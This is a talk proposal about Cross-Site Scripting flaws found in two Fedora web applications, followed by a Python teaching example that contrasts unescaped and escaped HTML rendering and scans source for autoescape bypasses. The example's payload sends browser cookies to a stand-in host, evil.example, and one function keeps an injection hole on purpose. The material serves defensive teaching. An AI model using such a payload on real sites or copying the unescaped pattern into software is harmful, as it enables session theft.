#119 [Talk-50] The XSS Files, I want to believe
Opened 11 months ago by misc. Modified 9 months ago

  1. What is your proposal?

During a small security audit last year, several Cross-Site Scripting (XSS) security issues were found in two Fedora-hosted web applications (fedora-tagger, pagure). Based on those examples, this talk will explain the basics of XSS (injecting JavaScript into a web page to take control of the browser), where to look for them, how they were fixed, and how to mitigate the whole class of vulnerabilities in the future.

The aim of this talk is to help people make Fedora infra (or others) safer, by improving understanding of this class of problem and scaling the efforts around security audits. A basic understanding of Python would help, but is not needed.

  2. Who in addition to the speaker needs to be in the room for this to succeed?
  • People who work on Fedora web applications, or any Python web app
  3. Is this a…
  • 50 minutes: Talk
  4. Anything else we need to know?

Regular A/V would be nice.

I do not plan to drop 0 days (or rather I have nothing to drop yet). I also do not plan to sing on stage.

  5. Who are you?
  • Name: Michael Scherer
  • FAS ID: misc
  • IRC Nick, if not FAS ID:

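As an added illustration of the XSS basics the proposal describes (not code from the talk, from pagure or from fedora-tagger), the example below shows the vulnerable pattern of a Python web app building HTML with string formatting next to its escaped form, plus a small audit helper that flags the places one would look for such bugs in Flask/Jinja2 code. The payload, the source lines being scanned, and the function names are all constructed for this example; the audited applications' actual code and fixes are not reproduced here.

```python
import html
import re
import urllib.parse

# Constructed attacker payload (assumption, not taken from the audit): a "tag name"
# that carries script instead of text.
PAYLOAD = '<script>document.location="http://evil.example/?c="+document.cookie</script>'


def render_tag_vulnerable(tag):
    """Interpolates untrusted input straight into HTML: the browser parses the payload as markup."""
    return '<li class="tag">%s</li>' % tag


def render_tag_fixed(tag):
    """Same template, but the value is escaped for the HTML text context before insertion."""
    return '<li class="tag">%s</li>' % html.escape(tag, quote=True)


def render_tag_link_fixed(tag):
    """Each context gets its own encoder: URL-encoding in the path, HTML-escaping in the
    attribute value and in the element body. quote=True matters in the attribute, where a
    bare double quote would otherwise close the attribute early."""
    return '<a href="/tag/%s" title="%s">%s</a>' % (
        urllib.parse.quote(tag, safe=""),
        html.escape(tag, quote=True),
        html.escape(tag, quote=True),
    )


def contains_script_tag(rendered):
    """Crude check used to show whether the payload survived as live markup."""
    return "<script" in rendered.lower()


# Where to look: constructs that bypass or disable Jinja2 autoescaping, plus HTML literals
# glued together with % or .format(). Patterns are an assumption of this example, not an
# exhaustive list.
_RISKY = [
    ("Markup(", "Markup() marks the value as trusted HTML"),
    ("|safe", "|safe disables autoescaping for this value"),
    ("autoescape=False", "autoescaping switched off"),
    ("render_template_string(", "template source assembled at runtime"),
]
_HTML_FORMAT = re.compile(r"""["'][^"']*<[^"']*["']\s*(%|\.format\()""")


def find_risky_lines(lines):
    """Return (index, reason) for each source line that deserves a closer look."""
    hits = []
    for idx, line in enumerate(lines):
        for needle, reason in _RISKY:
            if needle in line:
                hits.append((idx, reason))
                break
        else:
            if _HTML_FORMAT.search(line):
                hits.append((idx, "HTML literal built with % or .format()"))
    return hits


# Constructed sample of Python and Jinja2 source lines to scan (not from any real project).
SAMPLE_SOURCE = [
    'return render_template("tag.html", tag=Markup(tag))',
    "{{ project.description|safe }}",
    'return "<h1>%s</h1>" % request.args.get("q")',
    "{{ tag.label }}",
    'return render_template("tag.html", tag=tag)',
]


if __name__ == "__main__":
    print("vulnerable:", render_tag_vulnerable(PAYLOAD))
    print("fixed:     ", render_tag_fixed(PAYLOAD))
    print("link:      ", render_tag_link_fixed(PAYLOAD))
    for idx, reason in find_risky_lines(SAMPLE_SOURCE):
        print("line %d: %s" % (idx, reason))
```

The fix for the whole class is to stop building HTML by hand and let the template engine escape by default; the scanner only finds the places where that default has been overridden, which is exactly where an audit should start reading.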

